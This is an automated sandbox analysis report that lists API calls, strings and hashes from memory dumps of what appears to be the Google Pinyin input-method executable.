                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Path$CombineExistsFile_memset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2581113554-0
                                                                                                                                                                    • Opcode ID: b629c4920a53c7b5a3595ba8c97d678fa25259f16e1829fea87cd9b47372c0fe
                                                                                                                                                                    • Instruction ID: 8c766e44382b22b2bc62d4ced1a7578c34ddcf9ea0c6c8ada85d9784da93907a
                                                                                                                                                                    • Opcode Fuzzy Hash: b629c4920a53c7b5a3595ba8c97d678fa25259f16e1829fea87cd9b47372c0fe
                                                                                                                                                                    • Instruction Fuzzy Hash: 43519FB15083459BC720DF15D981AABB7E9FFC9704F40492EF58987240E778E988CB9B
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • CharNextW.USER32(?,?,00000000,?,?,?,00402EFA,09D48295,?,?,?,?,?,00510206,000000FF), ref: 0040241C
                                                                                                                                                                    • CharNextW.USER32(00000000,?,?,00000000,?,?,?,00402EFA,09D48295,?,?,?,?,?,00510206,000000FF), ref: 0040243D
                                                                                                                                                                    • CharNextW.USER32(00000000,?,?,00000000,?,?,?,00402EFA,09D48295,?,?,?,?,?,00510206,000000FF), ref: 00402456
                                                                                                                                                                    • CharNextW.USER32(00000000,?,?,00000000,?,?,?,00402EFA,09D48295,?,?,?,?,?,00510206,000000FF), ref: 0040245D
                                                                                                                                                                    • CharNextW.USER32(00000000,?,?,00000000,?,?,?,00402EFA,09D48295,?,?,?,?,?,00510206,000000FF), ref: 004024A8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CharNext
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3213498283-0
                                                                                                                                                                    • Opcode ID: a4eb61da0eeef5befef620cc4837072a271862b1a6a184ec6dc6cee83ed2fc41
                                                                                                                                                                    • Instruction ID: 016fb98a43e036d45944d59fcd2c91a011f2a73f7fcd71db903160db5305221b
                                                                                                                                                                    • Opcode Fuzzy Hash: a4eb61da0eeef5befef620cc4837072a271862b1a6a184ec6dc6cee83ed2fc41
                                                                                                                                                                    • Instruction Fuzzy Hash: 4041D0312142128ADB249F38DD58577F3E2EFA83207A4497BD486D33D5EB79D881C358
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • PtInRect.USER32(?,00000000,?), ref: 00449150
                                                                                                                                                                    • SetCursor.USER32(?), ref: 0044915E
                                                                                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 00449181
                                                                                                                                                                    • UpdateWindow.USER32(?), ref: 0044918B
                                                                                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 004491BE
                                                                                                                                                                    • UpdateWindow.USER32(?), ref: 004491C8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Rect$InvalidateUpdateWindow$Cursor
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3954524864-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,0040D3BF,?,00000000), ref: 0040D7A8
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0040D7B8
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0040D7C5
                                                                                                                                                                    • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 0040D7F0
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040D7FF
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0040D82A
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$Leave$CurrentEnterObjectReleaseSemaphoreSingleThreadWait
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1205197067-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00407C30: _memmove.LIBCMT ref: 00407C63
                                                                                                                                                                      • Part of subcall function 00409F80: std::_Xinvalid_argument.LIBCPMT ref: 00409F93
                                                                                                                                                                      • Part of subcall function 00409F80: _memmove.LIBCMT ref: 00409FCE
                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0047594A
                                                                                                                                                                      • Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3A3
                                                                                                                                                                      • Part of subcall function 004EE38E: __CxxThrowException@8.LIBCMT ref: 004EE3B8
                                                                                                                                                                      • Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3C9
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Xinvalid_argument_memmovestd::_std::exception::exception$Exception@8Throw
                                                                                                                                                                    • String ID: .$.$.$string too long
                                                                                                                                                                    • API String ID: 3981141188-1442959683
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004112A0: _memset.LIBCMT ref: 004112C0
                                                                                                                                                                      • Part of subcall function 004112A0: GetVersionExW.KERNEL32 ref: 004112D4
                                                                                                                                                                    • GetUserNameW.ADVAPI32(00000000,?), ref: 004136FE
                                                                                                                                                                    • GetUserNameW.ADVAPI32 ref: 0041372E
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: NameUser$Version_memset
                                                                                                                                                                    • String ID: Google\Google Pinyin 2$data$user
                                                                                                                                                                    • API String ID: 1985856877-3533915005
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • RegQueryValueExW.ADVAPI32 ref: 004424FD
                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(09D48295,HpsFlag,00000000,?,09D48295,09D48295), ref: 00442543
                                                                                                                                                                      • Part of subcall function 004051E0: _memmove.LIBCMT ref: 00405218
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: QueryValue$_memmove
                                                                                                                                                                    • String ID: HpsFlag$SendHpsFlag$hps
                                                                                                                                                                    • API String ID: 105235180-2996217291
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetSystemTime.KERNEL32(?,09D48295), ref: 0040C7F3
                                                                                                                                                                      • Part of subcall function 0040FD60: RegOpenCurrentUser.ADVAPI32(0002011F,?), ref: 0040FDE7
                                                                                                                                                                      • Part of subcall function 0040FD60: RegCloseKey.ADVAPI32(?,00000000,0002011F), ref: 0040FE1A
                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,?,LastReport,00000000,?,?,?), ref: 0040C846
                                                                                                                                                                    • VirtualQuery.KERNEL32(0040C630,?,0000001C), ref: 0040C881
                                                                                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040C897
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Query$Virtual$CloseCurrentOpenSystemTimeUserValue
                                                                                                                                                                    • String ID: LastReport
                                                                                                                                                                    • API String ID: 3011427647-1689103333
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(version,?,?,00000001,004547FC,09D48295,09D48295,?,00000000,00000001,00454C09,?,?,?,?,00000001), ref: 004546C8
                                                                                                                                                                    • __wcsnicmp.LIBCMT ref: 004546D7
                                                                                                                                                                    • _wcschr.LIBCMT ref: 004546ED
                                                                                                                                                                    • _wcscspn.LIBCMT ref: 00454737
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __wcsnicmp_wcschr_wcscspnlstrlen
                                                                                                                                                                    • String ID: version
                                                                                                                                                                    • API String ID: 1656015000-3206337475
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NW;;;LW),00000001,?,00000000), ref: 004DC04D
                                                                                                                                                                    • GetSecurityDescriptorSacl.ADVAPI32 ref: 004DC077
                                                                                                                                                                    • SetSecurityInfo.ADVAPI32(00411713,00000006,00000010,00000000,00000000,00000000,?), ref: 004DC091
                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 004DC0A4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Security$Descriptor$ConvertFreeInfoLocalSaclString
                                                                                                                                                                    • String ID: S:(ML;;NW;;;LW)
                                                                                                                                                                    • API String ID: 3116297227-495562761
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(Advapi32.dll,80000002,004016BC,80000002,00000000,80000002,?,00000007), ref: 0040137F
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 0040138F
                                                                                                                                                                    • RegCreateKeyExW.ADVAPI32(00000000,0040FE89,00000000,00000000,00000000,80000002,00000000,00000000,00000007,80000002,004016BC,80000002,00000000,80000002,?,00000007), ref: 004013D4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressCreateHandleModuleProc
                                                                                                                                                                    • String ID: Advapi32.dll$RegCreateKeyTransactedW
                                                                                                                                                                    • API String ID: 1964897782-2994018265
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(Advapi32.dll,?,00401734,?,?,?,00000000,?,?,004018A8,?), ref: 0040130F
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 0040131F
                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,00401734,?,?,?,00000000,?,?,004018A8,?), ref: 0040134E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleModuleOpenProc
                                                                                                                                                                    • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                                                                                                                                    • API String ID: 1337834000-3913318428
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00401710: RegCloseKey.ADVAPI32(?,?,?,004018A8,?), ref: 00401753
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004018B7
                                                                                                                                                                    • RegEnumKeyExW.ADVAPI32 ref: 004018EA
                                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00401924
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401939
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401959
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Close$Enum
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 464197530-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • _malloc.LIBCMT ref: 004F6560
                                                                                                                                                                      • Part of subcall function 004EF45B: __FF_MSGBANNER.LIBCMT ref: 004EF474
                                                                                                                                                                      • Part of subcall function 004EF45B: __NMSG_WRITE.LIBCMT ref: 004EF47B
                                                                                                                                                                      • Part of subcall function 004EF45B: HeapAlloc.KERNEL32(00000000,00000001,?,?,00000000,?,004EF8F9,?,00000000), ref: 004EF4A0
                                                                                                                                                                    • _free.LIBCMT ref: 004F6573
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocHeap_free_malloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2734353464-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • SetEvent.KERNEL32(?,00000000,00404C1B), ref: 0043C39F
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,0000EA60), ref: 0043C3AE
                                                                                                                                                                    • TerminateThread.KERNEL32(?,000000FF), ref: 0043C3C1
                                                                                                                                                                    • CloseHandle.KERNEL32(?,0052FD50,00000000,00404C1B), ref: 0043C3D6
                                                                                                                                                                    • CloseHandle.KERNEL32(?,0052FD50,00000000,00404C1B), ref: 0043C3E3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandle$EventObjectSingleTerminateThreadWait
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3210639814-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: swprintf
                                                                                                                                                                    • String ID: $$%$+
                                                                                                                                                                    • API String ID: 233258989-3202472541
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: swprintf
                                                                                                                                                                    • String ID: $$%$+
                                                                                                                                                                    • API String ID: 233258989-3202472541
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00405450: std::_Xinvalid_argument.LIBCPMT ref: 004054B0
                                                                                                                                                                      • Part of subcall function 00405450: _memmove.LIBCMT ref: 00405506
                                                                                                                                                                      • Part of subcall function 0040E1F0: RegQueryValueExW.ADVAPI32 ref: 0040E240
                                                                                                                                                                    • PathCombineW.SHLWAPI(?,?,Dictionaries,?,00000008), ref: 00414926
                                                                                                                                                                      • Part of subcall function 00405050: RegCloseKey.ADVAPI32(00000000,09D48295,00000000,00000000,0050F9D8,000000FF,0040E97D,00000000,00000000), ref: 004050B2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCombinePathQueryValueXinvalid_argument_memmovestd::_
                                                                                                                                                                    • String ID: DataPath$Dictionaries$Software\Google\Google Pinyin 2
                                                                                                                                                                    • API String ID: 3211815777-3380162126
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004EF8DA: _malloc.LIBCMT ref: 004EF8F4
                                                                                                                                                                    • CreateMutexW.KERNEL32(00000000,00000000,GPY_DATA_STAT_MUTEX_2,00000000), ref: 004655C5
                                                                                                                                                                      • Part of subcall function 004DC020: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NW;;;LW),00000001,?,00000000), ref: 004DC04D
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000007,?,?), ref: 004656BB
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DescriptorSecurity$ConvertCreateExistsFileMutexPathString_malloc
                                                                                                                                                                    • String ID: GPY_DATA_STAT_MUTEX_2$imedata.dat
                                                                                                                                                                    • API String ID: 3731759923-1272836789
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • memcpy failed., xrefs: 004376D8
                                                                                                                                                                    • p:\p\agents\hpam2.eem\recipes\499894881\base\branches\goopy2_release_branch\googleclient\ime\goopy\storage\optional_control_file.cc, xrefs: 004376B3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memcpy_s_memset
                                                                                                                                                                    • String ID: memcpy failed.$p:\p\agents\hpam2.eem\recipes\499894881\base\branches\goopy2_release_branch\googleclient\ime\goopy\storage\optional_control_file.cc
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,ModeModified,00000000,?,?,09D48295,09D48295,00000000,?,?,00000000,?,?,?,?,00000000), ref: 0041219A
                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Param1Modified,00000000,?,?,?,?,00000000,?,?,?,?,00000000,005158C8,000000FF,00411E38), ref: 0041220E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: QueryValue
                                                                                                                                                                    • String ID: ModeModified$Param1Modified
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Xinvalid_argument_memmovestd::_
                                                                                                                                                                    • String ID: GooglePinyinService.exe$string too long
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • CertNameToStrW.CRYPT32(00010001,?,52000003,?,00000800), ref: 0045C6F0
                                                                                                                                                                      • Part of subcall function 0045C560: _wcschr.LIBCMT ref: 0045C61E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CertName_wcschr
                                                                                                                                                                    • String ID: `QS$hQS$pQS
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00465042
                                                                                                                                                                      • Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3A3
                                                                                                                                                                      • Part of subcall function 004EE38E: __CxxThrowException@8.LIBCMT ref: 004EE3B8
                                                                                                                                                                      • Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3C9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                                    • String ID: gfff$gfff$vector<T> too long
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,0055F6E8,004069FE,00000002), ref: 00406390
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,0055F6E8,00000104), ref: 004063A9
                                                                                                                                                                    • _strrchr.LIBCMT ref: 004063B6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileModuleNamePathTemp_strrchr
                                                                                                                                                                    • String ID: /debug.log
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 0045F774
                                                                                                                                                                      • Part of subcall function 0045F580: SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,?,?,?,?,0045F781,00000000,00000000), ref: 0045F598
                                                                                                                                                                      • Part of subcall function 0045F580: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,?,?,0045F781,00000000,00000000), ref: 0045F5B4
                                                                                                                                                                      • Part of subcall function 0045F580: _malloc.LIBCMT ref: 0045F605
                                                                                                                                                                    • SetFilePointer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 0045F79D
                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,00000000), ref: 0045F897
                                                                                                                                                                    • _malloc.LIBCMT ref: 0045F8D6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
